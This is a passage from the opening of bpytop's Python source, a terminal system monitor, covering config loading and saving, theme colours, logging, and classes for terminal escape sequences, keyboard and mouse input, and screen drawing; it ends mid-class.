# tab-size = 4
# Copyright 2020 Aristocratos (jakob@qvantnet.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys, threading, signal, re, subprocess, logging, logging.handlers, argparse
import urllib.request
from time import time, sleep, strftime, localtime
from datetime import timedelta
from _thread import interrupt_main
from collections import defaultdict
from select import select
from distutils.util import strtobool
from string import Template
from math import ceil, floor
from random import randint
from shutil import which
from typing import List, Set, Dict, Tuple, Optional, Union, Any, Callable, ContextManager, Iterable, Type, NamedTuple
errors: List[str] = []
try: import fcntl, termios, tty, pwd
except Exception as e: errors.append(f'{e}')
try: import psutil # type: ignore
except Exception as e: errors.append(f'{e}')
SELF_START = time()
SYSTEM: str
if "linux" in sys.platform: SYSTEM = "Linux"
elif "bsd" in sys.platform: SYSTEM = "BSD"
elif "darwin" in sys.platform: SYSTEM = "MacOS"
else: SYSTEM = "Other"
if errors:
print("ERROR!")
print("\n".join(errors))
if SYSTEM == "Other":
print("\nUnsupported platform!\n")
else:
print("\nInstall required modules!\n")
raise SystemExit(1)
VERSION: str = "1.0.56"
#? Argument parser ------------------------------------------------------------------------------->
args = argparse.ArgumentParser()
args.add_argument("-b", "--boxes", action="store", dest="boxes", help ="Which boxes to show at start, example: -b \"cpu mem net proc\"")
args.add_argument("-v", "--version", action="store_true" ,help ="Show version info and exit")
args.add_argument("--debug", action="store_true" ,help ="Start with loglevel set to DEBUG overriding value set in config")
stdargs = args.parse_args()
if stdargs.version:
print(f'bpytop version: {VERSION}\n'
f'psutil version: {".".join(str(x) for x in psutil.version_info)}')
raise SystemExit(0)
ARG_BOXES: str = stdargs.boxes
DEBUG = stdargs.debug
#? Variables ------------------------------------------------------------------------------------->
BANNER_SRC: List[Tuple[str, str, str]] = [
("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"),
("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"),
("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"),
("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "),
("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"),
("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"),
]
#*?This is the template used to create the config file
DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + '''
#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="$color_theme"
#* If the theme set background should be shown, set to False if you want terminal background transparency
theme_background=$theme_background
#* Manually set which boxes to show. Available values are "cpu mem net proc", seperate values with whitespace.
shown_boxes="$shown_boxes"
#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=$update_ms
#* Processes update multiplier, sets how often the process list is updated as a multiplier of "update_ms".
#* Set to 2 or higher to greatly decrease bpytop cpu usage. (Only integers)
proc_update_mult=$proc_update_mult
#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="$proc_sorting"
#* Reverse sorting order, True or False.
proc_reversed=$proc_reversed
#* Show processes as a tree
proc_tree=$proc_tree
#* Which depth the tree view should auto collapse processes at
tree_depth=$tree_depth
#* Use the cpu graph colors in the process list.
proc_colors=$proc_colors
#* Use a darkening gradient in the process list.
proc_gradient=$proc_gradient
#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=$proc_per_core
#* Show process memory as bytes instead of percent
proc_mem_bytes=$proc_mem_bytes
#* Check cpu temperature, needs "osx-cpu-temp" on MacOS X.
check_temp=$check_temp
#* Which sensor to use for cpu temperature, use options menu to select from list of available sensors.
cpu_sensor=$cpu_sensor
#* Show temperatures for cpu cores also if check_temp is True and sensors has been found
show_coretemp=$show_coretemp
#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="$draw_clock"
#* Update main ui in background when menus are showing, set this to false if the menus is flickering too much for comfort.
background_update=$background_update
#* Custom cpu model name, empty string to disable.
custom_cpu_name="$custom_cpu_name"
#* Optional filter for shown disks, should be full path of a mountpoint, separate multiple values with a comma ",".
#* Begin line with "exclude=" to change to exclude filter, oterwise defaults to "most include" filter. Example: disks_filter="exclude=/boot, /home/user"
disks_filter="$disks_filter"
#* Show graphs instead of meters for memory values.
mem_graphs=$mem_graphs
#* If swap memory should be shown in memory box.
show_swap=$show_swap
#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=$swap_disk
#* If mem box should be split to also show disks info.
show_disks=$show_disks
#* Filter out non physical disks. Set this to False to include network disks, RAM disks and similar.
only_physical=$only_physical
#* Read disks list from /etc/fstab. This also disables only_physical.
use_fstab=$use_fstab
#* Set fixed values for network graphs, default "10M" = 10 Mibibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, i.e "100mbit"
net_download="$net_download"
net_upload="$net_upload"
#* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest.
net_auto=$net_auto
#* Sync the scaling for download and upload to whichever currently has the highest scale
net_sync=$net_sync
#* If the network graphs color gradient should scale to bandwith usage or auto scale, bandwith usage is based on "net_download" and "net_upload" values
net_color_fixed=$net_color_fixed
#* Starts with the Network Interface specified here.
net_iface=$net_iface
#* Show battery stats in top right if battery is present
show_battery=$show_battery
#* Show init screen at startup, the init screen is purely cosmetical
show_init=$show_init
#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=$update_check
#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=$log_level
''')
CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop'
if not os.path.isdir(CONFIG_DIR):
try:
os.makedirs(CONFIG_DIR)
os.mkdir(f'{CONFIG_DIR}/themes')
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf'
THEME_DIR: str = ""
if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes'
else:
for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]:
if os.path.isdir(f'{td}share/bpytop/themes'):
THEME_DIR = f'{td}share/bpytop/themes'
break
USER_THEME_DIR: str = f'{CONFIG_DIR}/themes'
CORES: int = psutil.cpu_count(logical=False) or 1
THREADS: int = psutil.cpu_count(logical=True) or 1
THREAD_ERROR: int = 0
DEFAULT_THEME: Dict[str, str] = {
"main_bg" : "#00",
"main_fg" : "#cc",
"title" : "#ee",
"hi_fg" : "#969696",
"selected_bg" : "#7e2626",
"selected_fg" : "#ee",
"inactive_fg" : "#40",
"graph_text" : "#60",
"meter_bg" : "#40",
"proc_misc" : "#0de756",
"cpu_box" : "#3d7b46",
"mem_box" : "#8a882e",
"net_box" : "#423ba5",
"proc_box" : "#923535",
"div_line" : "#30",
"temp_start" : "#4897d4",
"temp_mid" : "#5474e8",
"temp_end" : "#ff40b6",
"cpu_start" : "#50f095",
"cpu_mid" : "#f2e266",
"cpu_end" : "#fa1e1e",
"free_start" : "#223014",
"free_mid" : "#b5e685",
"free_end" : "#dcff85",
"cached_start" : "#0b1a29",
"cached_mid" : "#74e6fc",
"cached_end" : "#26c5ff",
"available_start" : "#292107",
"available_mid" : "#ffd77a",
"available_end" : "#ffb814",
"used_start" : "#3b1f1c",
"used_mid" : "#d9626d",
"used_end" : "#ff4769",
"download_start" : "#231a63",
"download_mid" : "#4f43a3",
"download_end" : "#b0a9de",
"upload_start" : "#510554",
"upload_mid" : "#7d4180",
"upload_end" : "#dcafde",
"process_start" : "#80d0a3",
"process_mid" : "#dcd179",
"process_end" : "#d45454",
}
MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = {
"options" : {
"normal" : (
"┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐",
"│ │├─┘ │ ││ ││││└─┐",
"└─┘┴ ┴ ┴└─┘┘└┘└─┘"),
"selected" : (
"╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗",
"║ ║╠═╝ ║ ║║ ║║║║╚═╗",
"╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") },
"help" : {
"normal" : (
"┬ ┬┌─┐┬ ┌─┐",
"├─┤├┤ │ ├─┘",
"┴ ┴└─┘┴─┘┴ "),
"selected" : (
"╦ ╦╔═╗╦ ╔═╗",
"╠═╣║╣ ║ ╠═╝",
"╩ ╩╚═╝╩═╝╩ ") },
"quit" : {
"normal" : (
"┌─┐ ┬ ┬ ┬┌┬┐",
"│─┼┐│ │ │ │ ",
"└─┘└└─┘ ┴ ┴ "),
"selected" : (
"╔═╗ ╦ ╦ ╦╔╦╗ ",
"║═╬╗║ ║ ║ ║ ",
"╚═╝╚╚═╝ ╩ ╩ ") }
}
MENU_COLORS: Dict[str, Tuple[str, ...]] = {
"normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"),
"selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00")
}
#? Units for floating_humanizer function
UNITS: Dict[str, Tuple[str, ...]] = {
"bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"),
"byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB")
}
SUBSCRIPT: Tuple[str, ...] = ("₀", "₁", "₂", "₃", "₄", "₅", "₆", "₇", "₈", "₉")
SUPERSCRIPT: Tuple[str, ...] = ("⁰", "¹", "²", "³", "⁴", "⁵", "⁶", "⁷", "⁸", "⁹")
#? Setup error logger ---------------------------------------------------------------->
try:
errlog = logging.getLogger("ErrorLogger")
errlog.setLevel(logging.DEBUG)
eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4)
eh.setLevel(logging.DEBUG)
eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)"))
errlog.addHandler(eh)
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
#? Timers for testing and debugging -------------------------------------------------------------->
class TimeIt:
timers: Dict[str, float] = {}
paused: Dict[str, float] = {}
@classmethod
def start(cls, name):
cls.timers[name] = time()
@classmethod
def pause(cls, name):
if name in cls.timers:
cls.paused[name] = time() - cls.timers[name]
del cls.timers[name]
@classmethod
def stop(cls, name):
if name in cls.timers:
total: float = time() - cls.timers[name]
del cls.timers[name]
if name in cls.paused:
total += cls.paused[name]
del cls.paused[name]
errlog.debug(f'{name} completed in {total:.6f} seconds')
def timeit_decorator(func):
def timed(*args, **kw):
ts = time()
out = func(*args, **kw)
errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
return out
return timed
#? Set up config class and load config ----------------------------------------------------------->
class Config:
'''Holds all config variables and functions for loading from and saving to disk'''
keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap",
"swap_disk", "show_disks", "use_fstab", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "theme_background",
"net_sync", "show_battery", "tree_depth", "cpu_sensor", "show_coretemp", "proc_update_mult", "shown_boxes", "net_iface", "only_physical"]
conf_dict: Dict[str, Union[str, int, bool]] = {}
color_theme: str = "Default"
theme_background: bool = True
shown_boxes: str = "cpu mem net proc"
update_ms: int = 2000
proc_update_mult: int = 2
proc_sorting: str = "cpu lazy"
proc_reversed: bool = False
proc_tree: bool = False
tree_depth: int = 3
proc_colors: bool = True
proc_gradient: bool = True
proc_per_core: bool = False
proc_mem_bytes: bool = True
check_temp: bool = True
cpu_sensor: str = "Auto"
show_coretemp: bool = True
draw_clock: str = "%X"
background_update: bool = True
custom_cpu_name: str = ""
disks_filter: str = ""
update_check: bool = True
mem_graphs: bool = True
show_swap: bool = True
swap_disk: bool = True
show_disks: bool = True
only_physical: bool = True
use_fstab: bool = False
net_download: str = "10M"
net_upload: str = "10M"
net_color_fixed: bool = False
net_auto: bool = True
net_sync: bool = False
net_iface: str = ""
show_battery: bool = True
show_init: bool = True
log_level: str = "WARNING"
warnings: List[str] = []
info: List[str] = []
sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"]
log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"]
cpu_sensors: List[str] = [ "Auto" ]
if hasattr(psutil, "sensors_temperatures"):
try:
_temps = psutil.sensors_temperatures()
if _temps:
for _name, _entries in _temps.items():
for _num, _entry in enumerate(_entries, 1):
if hasattr(_entry, "current"):
cpu_sensors.append(f'{_name}:{_num if _entry.label == "" else _entry.label}')
except:
pass
changed: bool = False
recreate: bool = False
config_file: str = ""
_initialized: bool = False
def __init__(self, path: str):
self.config_file = path
conf: Dict[str, Union[str, int, bool]] = self.load_config()
if not "version" in conf.keys():
self.recreate = True
self.info.append(f'Config file malformatted or missing, will be recreated on exit!')
elif conf["version"] != VERSION:
self.recreate = True
self.info.append(f'Config file version and bpytop version missmatch, will be recreated on exit!')
for key in self.keys:
if key in conf.keys() and conf[key] != "_error_":
setattr(self, key, conf[key])
else:
self.recreate = True
self.conf_dict[key] = getattr(self, key)
self._initialized = True
def __setattr__(self, name, value):
if self._initialized:
object.__setattr__(self, "changed", True)
object.__setattr__(self, name, value)
if name not in ["_initialized", "recreate", "changed"]:
self.conf_dict[name] = value
def load_config(self) -> Dict[str, Union[str, int, bool]]:
'''Load config from file, set correct types for values and return a dict'''
new_config: Dict[str,Union[str, int, bool]] = {}
conf_file: str = ""
if os.path.isfile(self.config_file):
conf_file = self.config_file
elif os.path.isfile("/etc/bpytop.conf"):
conf_file = "/etc/bpytop.conf"
else:
return new_config
try:
with open(conf_file, "r") as f:
for line in f:
line = line.strip()
if line.startswith("#? Config"):
new_config["version"] = line[line.find("v. ") + 3:]
continue
if not '=' in line:
continue
key, line = line.split('=', maxsplit=1)
if not key in self.keys:
continue
line = line.strip('"')
if type(getattr(self, key)) == int:
try:
new_config[key] = int(line)
except ValueError:
self.warnings.append(f'Config key "{key}" should be an integer!')
if type(getattr(self, key)) == bool:
try:
new_config[key] = bool(strtobool(line))
except ValueError:
self.warnings.append(f'Config key "{key}" can only be True or False!')
if type(getattr(self, key)) == str:
new_config[key] = str(line)
except Exception as e:
errlog.exception(str(e))
if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options:
new_config["proc_sorting"] = "_error_"
self.warnings.append(f'Config key "proc_sorted" didn\'t get an acceptable value!')
if "log_level" in new_config and not new_config["log_level"] in self.log_levels:
new_config["log_level"] = "_error_"
self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!')
if "update_ms" in new_config and int(new_config["update_ms"]) < 100:
new_config["update_ms"] = 100
self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!')
for net_name in ["net_download", "net_upload"]:
if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore
new_config[net_name] = "_error_"
if "cpu_sensor" in new_config and not new_config["cpu_sensor"] in self.cpu_sensors:
new_config["cpu_sensor"] = "_error_"
self.warnings.append(f'Config key "cpu_sensor" does not contain an available sensor!')
if "shown_boxes" in new_config and not new_config["shown_boxes"] == "":
for box in new_config["shown_boxes"].split(): #type: ignore
if not box in ["cpu", "mem", "net", "proc"]:
new_config["shown_boxes"] = "_error_"
self.warnings.append(f'Config key "shown_boxes" contains invalid box names!')
break
return new_config
def save_config(self):
'''Save current config to config file if difference in values or version, creates a new file if not found'''
if not self.changed and not self.recreate: return
try:
with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f:
f.write(DEFAULT_CONF.substitute(self.conf_dict))
except Exception as e:
errlog.exception(str(e))
try:
CONFIG: Config = Config(CONFIG_FILE)
if DEBUG:
errlog.setLevel(logging.DEBUG)
else:
errlog.setLevel(getattr(logging, CONFIG.log_level))
DEBUG = CONFIG.log_level == "DEBUG"
errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}')
errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}')
errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}')
errlog.debug(f'CMD: {" ".join(sys.argv)}')
if CONFIG.info:
for info in CONFIG.info:
errlog.info(info)
CONFIG.info = []
if CONFIG.warnings:
for warning in CONFIG.warnings:
errlog.warning(warning)
CONFIG.warnings = []
except Exception as e:
errlog.exception(f'{e}')
raise SystemExit(1)
if ARG_BOXES:
_new_boxes: List = []
for _box in ARG_BOXES.split():
if _box in ["cpu", "mem", "net", "proc"]:
_new_boxes.append(_box)
CONFIG.shown_boxes = " ".join(_new_boxes)
del _box, _new_boxes
if SYSTEM == "Linux" and not os.path.isdir("/sys/class/power_supply"):
CONFIG.show_battery = False
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!'
print("WARNING!", warn)
errlog.warning(warn)
#? Classes --------------------------------------------------------------------------------------->
class Term:
"""Terminal info and commands"""
width: int = 0
height: int = 0
resized: bool = False
_w : int = 0
_h : int = 0
fg: str = "" #* Default foreground color
bg: str = "" #* Default background color
hide_cursor = "\033[?25l" #* Hide terminal cursor
show_cursor = "\033[?25h" #* Show terminal cursor
alt_screen = "\033[?1049h" #* Switch to alternate screen
normal_screen = "\033[?1049l" #* Switch to normal screen
clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
mouse_off = "\033[?1002l" #* Disable mouse reporting
mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
winch = threading.Event()
@classmethod
def refresh(cls, *args, force: bool = False):
"""Update width, height and set resized flag if terminal has been resized"""
if cls.resized: cls.winch.set(); return
cls._w, cls._h = os.get_terminal_size()
if (cls._w, cls._h) == (cls.width, cls.height) and not force: return
if force: Collector.collect_interrupt = True
while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < 80 or cls._h < 24):
if Init.running: Init.resized = True
CpuBox.clock_block = True
cls.resized = True
Collector.collect_interrupt = True
cls.width, cls.height = cls._w, cls._h
Draw.now(Term.clear)
Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
if cls._w < 80 or cls._h < 24:
while cls._w < 80 or cls._h < 24:
Draw.now(Term.clear)
Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < 80 else Colors.green}{cls._w} ',
f'{Colors.default}Height: {Colors.red if cls._h < 24 else Colors.green}{cls._h}{Term.bg}{Term.fg}',
f'{Mv.to(cls._h // 2, cls._w // 2 - 23)}{Colors.default}{Colors.black_bg}Width and Height needs to be at least 80 x 24 !{Fx.ub}{Term.bg}{Term.fg}')
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
else:
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
Key.mouse = {}
Box.calc_sizes()
Collector.proc_counter = 1
if Init.running: cls.resized = False; return
if Menu.active: Menu.resized = True
Box.draw_bg(now=False)
cls.resized = False
Timer.finish()
@staticmethod
def echo(on: bool):
"""Toggle input echo"""
(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
if on:
lflag |= termios.ECHO # type: ignore
else:
lflag &= ~termios.ECHO # type: ignore
new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)
@staticmethod
def title(text: str = "") -> str:
out: str = f'{os.environ.get("TERMINAL_TITLE", "")}'
if out and text: out += " "
if text: out += f'{text}'
return f'\033]0;{out}\a'
class Fx:
"""Text effects
* trans(string: str): Replace whitespace with escape move right to not overwrite background behind whitespace.
* uncolor(string: str) : Removes all 24-bit color and returns string ."""
start = "\033[" #* Escape sequence start
sep = ";" #* Escape sequence separator
end = "m" #* Escape sequence end
reset = rs = "\033[0m" #* Reset foreground/background color and text effects
bold = b = "\033[1m" #* Bold on
unbold = ub = "\033[22m" #* Bold off
dark = d = "\033[2m" #* Dark on
undark = ud = "\033[22m" #* Dark off
italic = i = "\033[3m" #* Italic on
unitalic = ui = "\033[23m" #* Italic off
underline = u = "\033[4m" #* Underline on
ununderline = uu = "\033[24m" #* Underline off
blink = bl = "\033[5m" #* Blink on
unblink = ubl = "\033[25m" #* Blink off
strike = s = "\033[9m" #* Strike / crossed-out on
unstrike = us = "\033[29m" #* Strike / crossed-out off
#* Precompiled regex for finding a 24-bit color escape sequence in a string
color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")
@staticmethod
def trans(string: str):
return string.replace(" ", "\033[1C")
@classmethod
def uncolor(cls, string: str) -> str:
return f'{cls.color_re.sub("", string)}'
class Raw(object):
"""Set raw input mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.original_stty = termios.tcgetattr(self.stream)
tty.setcbreak(self.stream)
def __exit__(self, type, value, traceback):
termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)
class Nonblocking(object):
"""Set nonblocking mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
def __exit__(self, *args):
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)
class Mv:
"""Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
@staticmethod
def to(line: int, col: int) -> str:
return f'\033[{line};{col}f' #* Move cursor to line, column
@staticmethod
def right(x: int) -> str: #* Move cursor right x columns
return f'\033[{x}C'
@staticmethod
def left(x: int) -> str: #* Move cursor left x columns
return f'\033[{x}D'
@staticmethod
def up(x: int) -> str: #* Move cursor up x lines
return f'\033[{x}A'
@staticmethod
def down(x: int) -> str: #* Move cursor down x lines
return f'\033[{x}B'
save: str = "\033[s" #* Save cursor position
restore: str = "\033[u" #* Restore saved cursor postion
t = to
r = right
l = left
u = up
d = down
class Key:
"""Handles the threaded input reader for keypresses and mouse events"""
list: List[str] = []
mouse: Dict[str, List[List[int]]] = {}
mouse_pos: Tuple[int, int] = (0, 0)
escape: Dict[Union[str, Tuple[str, str]], str] = {
"\n" : "enter",
("\x7f", "\x08") : "backspace",
("[A", "OA") : "up",
("[B", "OB") : "down",
("[D", "OD") : "left",
("[C", "OC") : "right",
"[2~" : "insert",
"[3~" : "delete",
"[H" : "home",
"[F" : "end",
"[5~" : "page_up",
"[6~" : "page_down",
"\t" : "tab",
"[Z" : "shift_tab",
"OP" : "f1",
"OQ" : "f2",
"OR" : "f3",
"OS" : "f4",
"[15" : "f5",
"[17" : "f6",
"[18" : "f7",
"[19" : "f8",
"[20" : "f9",
"[21" : "f10",
"[23" : "f11",
"[24" : "f12"
}
new = threading.Event()
idle = threading.Event()
mouse_move = threading.Event()
mouse_report: bool = False
idle.set()
stopping: bool = False
started: bool = False
reader: threading.Thread
@classmethod
def start(cls):
cls.stopping = False
cls.reader = threading.Thread(target=cls._get_key)
cls.reader.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.reader.is_alive():
cls.stopping = True
try:
cls.reader.join()
except:
pass
@classmethod
def last(cls) -> str:
if cls.list: return cls.list.pop()
else: return ""
@classmethod
def get(cls) -> str:
if cls.list: return cls.list.pop(0)
else: return ""
@classmethod
def get_mouse(cls) -> Tuple[int, int]:
if cls.new.is_set():
cls.new.clear()
return cls.mouse_pos
@classmethod
def mouse_moved(cls) -> bool:
if cls.mouse_move.is_set():
cls.mouse_move.clear()
return True
else:
return False
@classmethod
def has_key(cls) -> bool:
return bool(cls.list)
@classmethod
def clear(cls):
cls.list = []
@classmethod
def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
'''Returns True if key is detected else waits out timer and returns False'''
if cls.list: return True
if mouse: Draw.now(Term.mouse_direct_on)
cls.new.wait(sec if sec > 0 else 0.0)
if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
if cls.new.is_set():
cls.new.clear()
return True
else:
return False
@classmethod
def break_wait(cls):
cls.list.append("_null")
cls.new.set()
sleep(0.01)
cls.new.clear()
@classmethod
def _get_key(cls):
"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread."""
input_key: str = ""
clean_key: str = ""
try:
while not cls.stopping:
with Raw(sys.stdin):
if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
continue
input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
if input_key == "\033": #* If first character is a escape sequence keep reading
cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting a IO Block error
Draw.idle.wait() #* Wait for Draw function to finish if busy
with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
input_key += sys.stdin.read(20)
if input_key.startswith("\033[<"):
_ = sys.stdin.read(1000)
cls.idle.set() #* Report IO blocking done
#errlog.debug(f'{repr(input_key)}')
if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033
elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
try:
cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
except:
pass
else:
if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
cls.mouse_move.set()
cls.new.set()
elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
clean_key = "mouse_scroll_up"
elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
clean_key = "mouse_scroll_down"
elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
if Menu.active:
clean_key = "mouse_click"
else:
for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
if list(cls.mouse_pos) in positions:
clean_key = key_name
break
else:
clean_key = "mouse_click"
elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
else:
for code in cls.escape.keys(): #* Go trough dict of escape codes to get the cleaned key name
if input_key.lstrip("\033").startswith(code):
clean_key = cls.escape[code]
break
else: #* If not found in escape dict and length of key is 1, assume regular character
if len(input_key) == 1:
clean_key = input_key
if clean_key:
cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
if len(cls.list) > 10: del cls.list[0]
clean_key = ""
cls.new.set() #* Set threading event to interrupt main thread sleep
input_key = ""
except Exception as e:
errlog.exception(f'Input thread failed with exception: {e}')
cls.idle.set()
cls.list.clear()
clean_quit(1, thread=True)
class Draw:
'''Holds the draw buffer and manages IO blocking queue
* .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
* - Adding "+" prefix to name sets append to True and appends to name's current string
* - Adding "!" suffix to name sets now to True and print name's current string
* .out(clear=False) : Print all strings in buffer, clear=True clear all buffers after
* .now(*args) : Prints all arguments as a string
* .clear(*names) : Clear named buffers, all if no argument
* .last_screen() : Prints all saved buffers
'''
strings: Dict[str, str] = {}
z_order: Dict[str, int] = {}
saved: Dict[str, str] = {}
save: Dict[str, bool] = {}
once: Dict[str, bool] = {}
idle = threading.Event()
idle.set()
@classmethod
def now(cls, *args):
'''Wait for input reader and self to be idle then print to screen'''
Key.idle.wait()
cls.idle.wait()
cls.idle.clear()
try:
print(*args, sep="", end="", flush=True)
except BlockingIOError:
pass
Key.idle.wait()
print(*args, sep="", end="", flush=True)
cls.idle.set()
@classmethod
def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
string: str = ""
if name.startswith("+"):
name = name.lstrip("+")
append = True
if name.endswith("!"):
name = name.rstrip("!")
now = True
cls.save[name] = not no_save
cls.once[name] = once
if not name in cls.z_order or z != 100: cls.z_order[name] = z
if args: string = "".join(args)
if only_save:
if name not in cls.saved or not append: cls.saved[name] = ""
cls.saved[name] += string
else:
if name not in cls.strings or not append: cls.strings[name] = ""
cls.strings[name] += string
if now:
cls.out(name)
@classmethod
